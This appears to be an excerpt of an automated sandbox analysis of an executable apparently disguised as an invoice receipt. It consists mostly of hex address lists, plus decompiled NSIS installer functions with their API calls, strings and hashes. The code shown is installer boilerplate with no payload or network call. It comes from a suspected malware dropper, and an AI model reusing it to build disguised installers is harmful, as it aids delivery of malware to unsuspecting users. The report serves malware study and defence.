0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00000000
0x00406828
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x00000000
0x0040667d
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}

0x00405d87
0x00405d90
0x00000000
0x00405d9d
0x00405d93
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,74E5F560), ref: 00405D87
FindClose.KERNEL32(00000000), ref: 00405D93

Strings

$B, xrefs: 00405D7D

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: $B
API String ID: 2295610775-2366330246
Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA3, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405dab
0x00405dae
0x00405db5
0x00405dbd
0x00405dca
0x00000000
0x00405dd1
0x00405dc0
0x00405dc8
0x00000000
0x00000000
0x00405dd9

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA

Uniqueness

Uniqueness Score: -1.00%

Function 004035E3, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0;
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x70
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004035e9
0x004035f2
0x004035f9
0x004035fb
0x0040360f
0x00403621
0x0040362b
0x00403630
0x00403636
0x00403649
0x00403649
0x00403654
0x004035fd
0x00403608
0x00403608
0x00403659
0x00403663
0x0040366c
0x00403678
0x004036ff
0x00403707
0x00403710
0x00403710
0x00403726
0x0040372c
0x0040373a
0x004037c9
0x004037d1
0x004037db
0x004037e0
0x004037e6
0x00403865
0x0040386a
0x0040386c
0x00403888
0x00000000
0x00403888
0x0040386e
0x00403874
0x0040387c
0x0040387c
0x00000000
0x00403874
0x004037f0
0x00403801
0x00403803
0x00403805
0x0040380c
0x0040380c
0x00403814
0x0040381c
0x0040381e
0x00403820
0x00403829
0x0040382c
0x00403832
0x00403832
0x00403851
0x0040385b
0x00000000
0x00403860
0x004037d3
0x004037d5
0x00000000
0x00403740
0x00403740
0x00403746
0x00403750
0x00403758
0x00403762
0x00403768
0x00403776
0x0040388d
0x0040388d
0x00000000
0x0040388d
0x0040377c
0x00403785
0x004037c4
0x00000000
0x004037c4
0x0040367e
0x0040367e
0x00403683
0x00000000
0x00000000
0x0040368d
0x0040369d
0x004036a2
0x004036a9
0x00000000
0x00000000
0x004036ad
0x004036af
0x004036bc
0x004036bc
0x004036c4
0x004036ca
0x004036f2
0x004036fa
0x00000000
0x004036dc
0x004036dd
0x004036e6
0x004036ec
0x004036ed
0x00000000
0x004036ed
0x004036e8
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036ea
0x004036ca

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
lstrlenA.KERNEL32(pzusn,?,?,?,pzusn,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ), ref: 004036BF
lstrcmpiA.KERNEL32(?,.exe,pzusn,?,?,?,pzusn,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
GetFileAttributesA.KERNEL32(pzusn), ref: 004036DD
LoadImageA.USER32 ref: 00403726

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

RegisterClassA.USER32 ref: 0040376D
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
CreateWindowExA.USER32 ref: 004037BE
ShowWindow.USER32(00000005,00000000), ref: 004037F0
LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
GetClassInfoA.USER32 ref: 0040381C
GetClassInfoA.USER32 ref: 00403829
RegisterClassA.USER32 ref: 00403832
DialogBoxParamA.USER32 ref: 00403851

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00403617
pzusn, xrefs: 0040368D, 00403695, 004036A2, 004036EC, 004036F2
1033, xrefs: 00403603, 0040364F
@6B, xrefs: 00403735
.exe, xrefs: 004036CC
C:\Users\user\AppData\Local\Temp\, xrefs: 004035E7
RichEdit, xrefs: 00403823
.DEFAULT\Control Panel\International, xrefs: 0040363F
"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" , xrefs: 004035EF
RichEd32, xrefs: 00403807
RichEd20, xrefs: 004037FC
RichEdit20A, xrefs: 00403814, 0040381A
C:\Users\user\AppData\Local\Temp, xrefs: 00403663, 0040366B, 004036F9, 004036FF, 0040370F
_Nb, xrefs: 0040377C, 00403781

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$pzusn
API String ID: 914957316-2499820448
Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C5B, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\G2M8C76V_INV0ICE_RECEIPT.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\hardz\\Desktop\\G2M8C76V_INV0ICE_RECEIPT.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\G2M8C76V_INV0ICE_RECEIPT.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4;
					if( *0x423eb4 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031DA( *0x423eb4 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x4d9a0
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4;
						if( *0x423eb4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x3e9c5
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x41253
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402c69
0x00402c6c
0x00402c86
0x00402c8b
0x00402c9e
0x00402ca3
0x00402ca9
0x00000000
0x00402cab
0x00402cbc
0x00402ccd
0x00402cd4
0x00402cda
0x00402cdc
0x00402ce1
0x00402ce3
0x00402dd3
0x00402dd5
0x00402dda
0x00402de1
0x00000000
0x00000000
0x00402de7
0x00402dea
0x00402e16
0x00402e1b
0x00402e26
0x00402e28
0x00402e39
0x00402e54
0x00402e5a
0x00402e5d
0x00402e62
0x00402e81
0x00402e91
0x00402ea3
0x00402ea8
0x00402ead
0x00402eb0
0x00402eb9
0x00402ebd
0x00402ec5
0x00402eca
0x00402ecc
0x00402ecc
0x00402ecc
0x00402ed4
0x00402ed4
0x00402ed7
0x00402ed8
0x00402ed8
0x00402edb
0x00402edd
0x00402edd
0x00402edd
0x00402ee0
0x00402ee7
0x00402ef3
0x00402ef8
0x00000000
0x00402ef8
0x00000000
0x00402eb0
0x00000000
0x00402e64
0x00402df2
0x00402dfd
0x00402e02
0x00402e04
0x00000000
0x00000000
0x00402e0d
0x00402e10
0x00000000
0x00000000
0x00000000
0x00402ce9
0x00402ce9
0x00402cee
0x00402cf2
0x00402cf9
0x00402cfe
0x00402d00
0x00402d02
0x00402d02
0x00402d0a
0x00402d0f
0x00402d11
0x00402e70
0x00402eb2
0x00000000
0x00402eb2
0x00402d17
0x00402d1d
0x00402d9d
0x00402da1
0x00402da4
0x00402da9
0x00000000
0x00402da1
0x00402d2a
0x00402d2f
0x00402d32
0x00402d37
0x00000000
0x00000000
0x00402d39
0x00402d40
0x00000000
0x00000000
0x00402d42
0x00402d49
0x00000000
0x00000000
0x00402d4b
0x00402d52
0x00000000
0x00000000
0x00402d54
0x00402d5b
0x00000000
0x00000000
0x00402d5d
0x00402d63
0x00402d6c
0x00402d72
0x00402d75
0x00402d77
0x00402d7d
0x00000000
0x00000000
0x00402d83
0x00402d87
0x00402d8f
0x00402d8f
0x00402d92
0x00402d95
0x00402d97
0x00402d99
0x00402d99
0x00000000
0x00402d97
0x00402d89
0x00402d8d
0x00000000
0x00000000
0x00000000
0x00402daa
0x00402daa
0x00402db0
0x00402dc0
0x00402dc0
0x00402dc3
0x00402dc9
0x00402dcb
0x00402dcb
0x00000000
0x00402ce9

APIs

GetTickCount.KERNEL32 ref: 00402C6F
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe,00000400), ref: 00402C8B

Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe,80000000,00000003), ref: 00405760
Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe,C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe,80000000,00000003), ref: 00402CD4
GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
Inst, xrefs: 00402D42
